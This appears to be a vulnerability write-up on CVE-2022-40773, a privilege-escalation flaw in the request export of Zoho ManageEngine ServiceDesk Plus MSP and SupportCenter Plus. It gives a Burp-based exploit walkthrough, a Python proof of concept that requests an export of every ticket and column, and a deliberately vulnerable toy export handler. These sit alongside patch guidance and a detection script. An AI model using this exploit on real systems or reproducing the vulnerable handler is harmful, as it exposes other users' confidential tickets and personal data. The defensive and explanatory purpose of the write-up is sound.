In 2022, an access control vulnerability was disclosed in Zoho ManageEngine ServiceDesk Plus MSP (builds before 10609) and SupportCenter Plus (builds before 11025). Tracked as CVE-2022-40773, it allows an authenticated user to escalate privileges through the request export functionality: during an "exportMickeyList" export of requests, a user could obtain sensitive data that they would not normally be permitted to view.

In this post, we'll break down what this vulnerability is, how it can be exploited, and what organizations should do to protect themselves. We'll also walk through a simplified exploit example and provide links to the original advisories for anyone wanting to dig deeper.

Affected Products

- ServiceDesk Plus MSP (builds before 10609)
- SupportCenter Plus (builds before 11025)

In both products, an authenticated user, including one with low privileges, could abuse the exportMickeyList feature in the requests list view. The export did not properly restrict what data the calling user could export, exposing sensitive information such as internal notes, comments, or other users' requests.

Official References

- Zoho Security Advisory for ServiceDesk Plus MSP (CVE-2022-40773)
- Zoho Security Advisory for SupportCenter Plus

The Vulnerable Function

At the heart of this bug is the exportMickeyList operation. In simple terms, it allows users to export a list of requests to various formats (such as CSV or Excel). However, the access control checks on this export did not enforce the caller's permissions on the exported rows and columns in the way the list view itself does, opening a pathway for attackers.

A normal, low-privileged user could send a specially-crafted request to export more data than they should.

Example Vulnerable Request (Pseudo-code)

POST /servlets/RequestServlet
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=<valid-session>

operation=exportMickeyList&module=Request&exportType=CSV&filter=<custom_filter>

Because the export honoured the client-supplied filter and column selection instead of re-deriving them from the caller's permissions, manipulating these parameters returns rows (tickets from other departments or other users) and fields (such as internal comments) that the list view would normally hide from that user.
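To make the flaw concrete, here is an added example that is not ManageEngine's code and is not taken from the advisory. It models a request-export handler over a constructed ticket table: export_vulnerable honours the client's filter and columnList as sent, while export_hardened applies them only to narrow what the caller is already allowed to see. The ticket rows, the roles, the filter syntax and the column names are all assumptions made for the illustration.

```python
"""Added example: a toy request-export handler in the vulnerable and the hardened form.
Everything here (ticket rows, roles, filter syntax) is constructed for illustration and
is not ManageEngine's implementation."""
import csv
import io
from dataclasses import dataclass

# Constructed ticket table. 'internal_notes' is a technician-only column.
TICKETS = [
    {"id": 1, "dept": "IT", "subject": "VPN down", "requester": "alice",
     "internal_notes": "escalated to netops"},
    {"id": 2, "dept": "HR", "subject": "Payroll query", "requester": "bob",
     "internal_notes": "salary dispute, keep confidential"},
    {"id": 3, "dept": "IT", "subject": "Laptop swap", "requester": "carol",
     "internal_notes": "asset tag pending"},
]
ALL_COLUMNS = ["id", "dept", "subject", "requester", "internal_notes"]


@dataclass(frozen=True)
class User:
    name: str
    role: str                                # "requester" or "technician"
    departments: frozenset = frozenset()     # departments a technician may see


def visible_rows(user):
    """Row-level scope: requesters see only their own tickets,
    technicians see the departments they are assigned to."""
    if user.role == "technician":
        return [t for t in TICKETS if t["dept"] in user.departments]
    return [t for t in TICKETS if t["requester"] == user.name]


def visible_columns(user):
    """Column-level permission: internal notes are hidden from requesters."""
    if user.role == "technician":
        return list(ALL_COLUMNS)
    return [c for c in ALL_COLUMNS if c != "internal_notes"]


def apply_filter(rows, filter_spec):
    """Constructed filter syntax: 'all' or 'dept:<name>'."""
    if filter_spec == "all":
        return list(rows)
    if filter_spec.startswith("dept:"):
        dept = filter_spec.split(":", 1)[1]
        return [r for r in rows if r["dept"] == dept]
    raise ValueError(f"unsupported filter {filter_spec!r}")


def export_vulnerable(user, filter_spec, column_list):
    """Flaw modelled after CVE-2022-40773: the filter runs over the whole table and
    the column list is honoured as sent, so filter=all&columnList=all returns every
    ticket with its internal notes regardless of who is asking."""
    rows = apply_filter(TICKETS, filter_spec)
    cols = list(ALL_COLUMNS) if column_list == "all" else [c for c in column_list if c in ALL_COLUMNS]
    return [{c: r[c] for c in cols} for r in rows]


def export_hardened(user, filter_spec, column_list):
    """Client parameters may only narrow the result: the filter is applied to the
    caller's visible rows, and the requested columns are intersected with the
    caller's visible columns."""
    rows = apply_filter(visible_rows(user), filter_spec)
    allowed = visible_columns(user)
    requested = allowed if column_list == "all" else column_list
    cols = [c for c in allowed if c in requested]
    return [{c: r[c] for c in cols} for r in rows]


def rows_to_csv(rows, cols):
    """Serialise exported rows in the column order used by the export."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=cols, lineterminator="\n")
    writer.writeheader()
    writer.writerows(rows)
    return buf.getvalue()


if __name__ == "__main__":
    bob = User("bob", "requester")
    print("vulnerable export for bob:", len(export_vulnerable(bob, "all", "all")), "rows, internal notes included")
    hardened = export_hardened(bob, "all", "all")
    print("hardened export for bob:")
    print(rows_to_csv(hardened, visible_columns(bob)))
```

The point of the hardened variant is that the server never widens the result on the strength of request parameters: the row scope and the permitted columns come from the session's identity, and the client's filter and column list are intersected with them. Run as a script it prints the three-row leak for the requester account beside the single-row, notes-free export the same account should receive.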

Exploit Walkthrough

Step 1: Log into the web interface as a low-privilege user.
Step 2: Intercept the request when using the list view export button (using a proxy like Burp Suite).
Step 3: Modify the POST request to alter the filter, field list, or module to include data you’re not supposed to see.
Step 4: Submit the request and download the export file.
Step 5: Open the CSV/XLS and review the sensitive data.

Example Exploit Code (Python Proof of Concept)

The following script demonstrates a simplified approach. It assumes valid credentials and a session cookie for a low-privileged user; the servlet path and parameter names mirror the pseudo-request above and are illustrative rather than taken from the product's source.

import requests

# Illustrative target: the servlet path and parameter names follow the
# pseudo-request above and are not taken from the product's source.
url = "https://target.example.com/servlets/RequestServlet"
cookies = {"JSESSIONID": "valid_session_id"}  # session of a low-privileged user

payload = {
    "operation": "exportMickeyList",
    "module": "Request",
    "exportType": "CSV",
    # Optionally manipulate these to grab more/other data
    "filter": "all",
    "columnList": "all",
}

response = requests.post(url, data=payload, cookies=cookies, timeout=30)
content_type = response.headers.get("Content-Type", "")

# A 200 with an HTML body is usually a login or error page, not an export,
# so check the content type before treating the body as the CSV.
if response.status_code == 200 and "text/html" not in content_type:
    with open("exported_data.csv", "wb") as f:
        f.write(response.content)
    print("[+] Export Complete: Check 'exported_data.csv'")
else:
    print("[-] Export failed:", response.status_code, content_type)

Note: In a real-world attack, the filter and columnList could be adjusted to include specific hidden attributes.

Why Does This Matter?

Privilege escalation vulnerabilities are a big deal. They allow users to bypass normal controls and get access to data or functionality usually off-limits. In busy IT helpdesk environments, this could mean exposure of:

- Confidential company issues raised as tickets
- Internal notes and comments on tickets
- Other users' requests and the personal data in them

If exploited by a malicious insider (or someone with stolen credentials), the consequences could be severe—ranging from data leaks to regulatory consequences.

Fixed Versions

- ServiceDesk Plus MSP build 10609 and up
- SupportCenter Plus build 11025 and up

These builds fix the access control flaw by enforcing, on the export, the same restrictions on who can export which rows and fields that apply to the list view.

How to Protect Yourself

1. Update Immediately: Ensure you are running ServiceDesk Plus MSP build 10609 or newer, and SupportCenter Plus build 11025 or newer. The build number is shown in the product's About page; compare it against these thresholds rather than the marketing version.

Summary of Zoho’s Guidance:

- ServiceDesk Plus MSP update guide
- SupportCenter Plus update guide

Final Thoughts

CVE-2022-40773 is a classic example of why the principle of least privilege must be enforced on every server-side path, not only in the UI. An export that reuses an existing list view still needs the same authorization checks as the view itself, applied to the rows and columns it emits rather than to the parameters the client sends.

If you're running an affected version, patch now and check for signs of abuse: successful exportMickeyList operations by accounts that have no business exporting requests, exports driven by scripted clients rather than a browser, and bursts of exports from a single session. Vulnerabilities like these are easy targets for attackers once they go public.
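As an added example of that check (not code from the page's author or from Zoho), the script below triages a constructed log for the three signals just listed. The JSON-lines format, its field names, the assumption that the proxy logs the form's operation value, and the role map are all assumptions made for the illustration; map them onto whatever your reverse proxy or the product's own logs actually record.

```python
"""Added example: flag suspicious request exports in a constructed audit log.
The JSON-lines format, field names and the role map are assumptions for this
illustration; map them onto whatever your reverse proxy or the product's own
logs actually record."""
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: one JSON object per request. The 'operation' field is
# assumed to be the form parameter of the same name, captured at the proxy.
SAMPLE_LOG = """\
{"ts": "2022-11-12T04:15:00Z", "user": "tina", "operation": "exportMickeyList", "status": 200, "bytes": 8120, "ua": "Mozilla/5.0 (Windows NT 10.0)"}
{"ts": "2022-11-12T04:16:30Z", "user": "bob", "operation": "exportMickeyList", "status": 200, "bytes": 51200, "ua": "python-requests/2.28.1"}
{"ts": "2022-11-12T04:16:41Z", "user": "bob", "operation": "exportMickeyList", "status": 200, "bytes": 51377, "ua": "python-requests/2.28.1"}
{"ts": "2022-11-12T04:16:55Z", "user": "bob", "operation": "exportMickeyList", "status": 200, "bytes": 51401, "ua": "python-requests/2.28.1"}
{"ts": "2022-11-12T04:20:00Z", "user": "alice", "operation": "AddRequest", "status": 200, "bytes": 312, "ua": "Mozilla/5.0 (X11; Linux)"}
"""

# Constructed role map; in practice pull this from the helpdesk's user directory.
ROLES = {"tina": "technician", "alice": "requester", "bob": "requester"}

PRIVILEGED_ROLES = {"technician", "admin"}   # roles expected to run exports
BURST_WINDOW = timedelta(minutes=5)
BURST_LIMIT = 3                               # exports within the window that count as a burst
BROWSER_PREFIXES = ("Mozilla/",)


def parse_log(text):
    """Parse JSON lines into records with a datetime 'ts'."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
        records.append(rec)
    return records


def find_suspicious_exports(records, roles):
    """Return {user: set(reasons)} for successful exportMickeyList calls that a
    reviewer should look at: exports by non-privileged roles, exports driven by a
    scripting client rather than a browser, and bursts of exports."""
    reasons = defaultdict(set)
    times_by_user = defaultdict(list)
    for r in records:
        if r["operation"] != "exportMickeyList" or r["status"] != 200:
            continue
        user = r["user"]
        if roles.get(user, "unknown") not in PRIVILEGED_ROLES:
            reasons[user].add("non-privileged-role")
        if not r["ua"].startswith(BROWSER_PREFIXES):
            reasons[user].add("scripted-user-agent")
        times_by_user[user].append(r["ts"])
    # Sliding window over each user's export timestamps.
    for user, times in times_by_user.items():
        times.sort()
        for i, start in enumerate(times):
            if sum(1 for t in times[i:] if t - start <= BURST_WINDOW) >= BURST_LIMIT:
                reasons[user].add("burst")
                break
    return dict(reasons)


if __name__ == "__main__":
    for user, why in find_suspicious_exports(parse_log(SAMPLE_LOG), ROLES).items():
        print(f"{user}: {', '.join(sorted(why))}")
```

On the constructed log the technician's single browser-driven export is not reported, while the requester account that ran three scripted exports in under a minute is flagged on all three signals. Because access logs rarely carry POST bodies, the operation field is the piece most likely to need a different source in a real deployment, such as the application's own audit trail.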

Extra Reading

- Official CVE entry from NIST
- Zoho’s PitStop advisory

Timeline

Published on: 11/12/2022 04:15:00 UTC
Last modified on: 08/08/2023 14:21:00 UTC